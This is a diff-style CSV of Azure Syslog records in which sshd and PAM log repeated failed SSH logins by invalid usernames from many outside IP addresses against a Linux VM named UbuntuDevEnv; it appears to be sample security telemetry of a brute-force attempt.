+17385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:19,UbuntuDevEnv,2019-06-26 09:05:18,auth,UbuntuDevEnv,info,Disconnected from invalid user Waschlappen 165.22.203.187 port 36046 [preauth],65421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,165.22.203.1,36046,,
+17386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:27,UbuntuDevEnv,2019-06-26 09:05:26,auth,UbuntuDevEnv,info,Invalid user testing from 118.24.90.122 port 32759,65445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testing,118.24.90.1,32759,,
+17387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:27,UbuntuDevEnv,2019-06-26 09:05:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:27,UbuntuDevEnv,2019-06-26 09:05:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,65445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:28,UbuntuDevEnv,2019-06-26 09:05:28,auth,UbuntuDevEnv,info,Failed password for invalid user testing from 118.24.90.122 port 32759 ssh2,65445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testing,118.24.90.1,32759,,
+17390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:28,UbuntuDevEnv,2019-06-26 09:05:28,auth,UbuntuDevEnv,info,Disconnected from invalid user testing 118.24.90.122 port 32759 [preauth],65445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testing,118.24.90.1,32759,,
+17391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:28,UbuntuDevEnv,2019-06-26 09:05:28,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 32759:11: Bye Bye [preauth],65445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,32759,,
+17392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:48,UbuntuDevEnv,2019-06-26 09:05:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,65523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:48,UbuntuDevEnv,2019-06-26 09:05:48,auth,UbuntuDevEnv,info,Invalid user applmgr from 143.0.52.117 port 47833,65523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,143.0.52.1,47833,,
+17394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:48,UbuntuDevEnv,2019-06-26 09:05:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:50,UbuntuDevEnv,2019-06-26 09:05:50,auth,UbuntuDevEnv,info,Failed password for invalid user applmgr from 143.0.52.117 port 47833 ssh2,65523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,143.0.52.1,47833,,
+17396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:50,UbuntuDevEnv,2019-06-26 09:05:50,auth,UbuntuDevEnv,info,Disconnected from invalid user applmgr 143.0.52.117 port 47833 [preauth],65523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,143.0.52.1,47833,,
+17397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:50,UbuntuDevEnv,2019-06-26 09:05:50,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 47833:11: Bye Bye [preauth],65523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,47833,,
+17398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:55,UbuntuDevEnv,2019-06-26 09:05:55,auth,UbuntuDevEnv,info,Invalid user butter from 187.6.249.142 port 48914,65553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,butter,187.6.249.1,48914,,
+17399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:55,UbuntuDevEnv,2019-06-26 09:05:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,65553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:55,UbuntuDevEnv,2019-06-26 09:05:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:57,UbuntuDevEnv,2019-06-26 09:05:57,auth,UbuntuDevEnv,info,Failed password for invalid user butter from 187.6.249.142 port 48914 ssh2,65553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,butter,187.6.249.1,48914,,
+17402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:57,UbuntuDevEnv,2019-06-26 09:05:57,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 48914:11: Bye Bye [preauth],65553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,48914,,
+17403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:05:57,UbuntuDevEnv,2019-06-26 09:05:57,auth,UbuntuDevEnv,info,Disconnected from invalid user butter 187.6.249.142 port 48914 [preauth],65553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,butter,187.6.249.1,48914,,
+17404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:06:29,UbuntuDevEnv,2019-06-26 09:06:28,auth,UbuntuDevEnv,info,Invalid user ni from 183.47.14.74 port 33275,65674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ni,183.47.14.7,33275,,
+17405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:06:29,UbuntuDevEnv,2019-06-26 09:06:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,65674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:06:29,UbuntuDevEnv,2019-06-26 09:06:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:06:31,UbuntuDevEnv,2019-06-26 09:06:30,auth,UbuntuDevEnv,info,Failed password for invalid user ni from 183.47.14.74 port 33275 ssh2,65674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ni,183.47.14.7,33275,,
+17408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:06:31,UbuntuDevEnv,2019-06-26 09:06:31,auth,UbuntuDevEnv,info,Disconnected from invalid user ni 183.47.14.74 port 33275 [preauth],65674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ni,183.47.14.7,33275,,
+17409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:06:31,UbuntuDevEnv,2019-06-26 09:06:31,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 33275:11: Bye Bye [preauth],65674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,33275,,
+17410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:25,UbuntuDevEnv,2019-06-26 09:07:24,auth,UbuntuDevEnv,info,Invalid user trevor from 176.31.43.255 port 48440,65874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,176.31.43.2,48440,,
+17411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:25,UbuntuDevEnv,2019-06-26 09:07:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,65874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:25,UbuntuDevEnv,2019-06-26 09:07:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:27,UbuntuDevEnv,2019-06-26 09:07:26,auth,UbuntuDevEnv,info,Failed password for invalid user trevor from 176.31.43.255 port 48440 ssh2,65874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,176.31.43.2,48440,,
+17414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:27,UbuntuDevEnv,2019-06-26 09:07:26,auth,UbuntuDevEnv,info,Disconnected from invalid user trevor 176.31.43.255 port 48440 [preauth],65874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trevor,176.31.43.2,48440,,
+17415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:27,UbuntuDevEnv,2019-06-26 09:07:26,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 48440:11: Bye Bye [preauth],65874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,48440,,
+17416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:29,UbuntuDevEnv,2019-06-26 09:07:28,auth,UbuntuDevEnv,info,Invalid user earthdrilling from 176.31.202.90 port 37504,65888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,176.31.202.9,37504,,
+17417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:29,UbuntuDevEnv,2019-06-26 09:07:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,65888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:29,UbuntuDevEnv,2019-06-26 09:07:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:30,UbuntuDevEnv,2019-06-26 09:07:29,auth,UbuntuDevEnv,info,Invalid user t7inst from 165.22.203.187 port 43094,65892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,165.22.203.1,43094,,
+17420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:30,UbuntuDevEnv,2019-06-26 09:07:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,65892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:30,UbuntuDevEnv,2019-06-26 09:07:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:30,UbuntuDevEnv,2019-06-26 09:07:30,auth,UbuntuDevEnv,info,Failed password for invalid user earthdrilling from 176.31.202.90 port 37504 ssh2,65888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,176.31.202.9,37504,,
+17423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:30,UbuntuDevEnv,2019-06-26 09:07:30,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 37504:11: Bye Bye [preauth],65888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,37504,,
+17424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:30,UbuntuDevEnv,2019-06-26 09:07:30,auth,UbuntuDevEnv,info,Disconnected from invalid user earthdrilling 176.31.202.90 port 37504 [preauth],65888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,176.31.202.9,37504,,
+17425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:32,UbuntuDevEnv,2019-06-26 09:07:31,auth,UbuntuDevEnv,info,Failed password for invalid user t7inst from 165.22.203.187 port 43094 ssh2,65892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,165.22.203.1,43094,,
+17426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:32,UbuntuDevEnv,2019-06-26 09:07:31,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 43094:11: Bye Bye [preauth],65892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,43094,,
+17427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:32,UbuntuDevEnv,2019-06-26 09:07:31,auth,UbuntuDevEnv,info,Disconnected from invalid user t7inst 165.22.203.187 port 43094 [preauth],65892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,t7inst,165.22.203.1,43094,,
+17428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:35,UbuntuDevEnv,2019-06-26 09:07:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:35,UbuntuDevEnv,2019-06-26 09:07:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,65911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:35,UbuntuDevEnv,2019-06-26 09:07:35,auth,UbuntuDevEnv,info,Invalid user jenkins from 143.0.52.117 port 56377,65911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,143.0.52.1,56377,,
+17431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:37,UbuntuDevEnv,2019-06-26 09:07:37,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 143.0.52.117 port 56377 ssh2,65911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,143.0.52.1,56377,,
+17432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:37,UbuntuDevEnv,2019-06-26 09:07:37,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 143.0.52.117 port 56377 [preauth],65911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,143.0.52.1,56377,,
+17433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:37,UbuntuDevEnv,2019-06-26 09:07:37,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 56377:11: Bye Bye [preauth],65911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,56377,,
+17434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:47,UbuntuDevEnv,2019-06-26 09:07:47,auth,UbuntuDevEnv,info,Invalid user zhua from 187.6.249.142 port 37580,65955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhua,187.6.249.1,37580,,
+17435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:47,UbuntuDevEnv,2019-06-26 09:07:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,65955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:47,UbuntuDevEnv,2019-06-26 09:07:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:49,UbuntuDevEnv,2019-06-26 09:07:49,auth,UbuntuDevEnv,info,Failed password for invalid user zhua from 187.6.249.142 port 37580 ssh2,65955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhua,187.6.249.1,37580,,
+17438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:49,UbuntuDevEnv,2019-06-26 09:07:49,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 37580:11: Bye Bye [preauth],65955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37580,,
+17439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:07:49,UbuntuDevEnv,2019-06-26 09:07:49,auth,UbuntuDevEnv,info,Disconnected from invalid user zhua 187.6.249.142 port 37580 [preauth],65955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhua,187.6.249.1,37580,,
+17440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:09,UbuntuDevEnv,2019-06-26 09:08:08,auth,UbuntuDevEnv,info,Invalid user gmod from 115.159.216.187 port 47775,66038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmod,115.159.216.1,47775,,
+17441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:09,UbuntuDevEnv,2019-06-26 09:08:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,66038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+17442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:09,UbuntuDevEnv,2019-06-26 09:08:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:11,UbuntuDevEnv,2019-06-26 09:08:10,auth,UbuntuDevEnv,info,Failed password for invalid user gmod from 115.159.216.187 port 47775 ssh2,66038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmod,115.159.216.1,47775,,
+17444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:08:11,UbuntuDevEnv,2019-06-26 09:08:10,auth,UbuntuDevEnv,info,Disconnected from invalid user gmod 115.159.216.187 port 47775 [preauth],66038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmod,115.159.216.1,47775,,
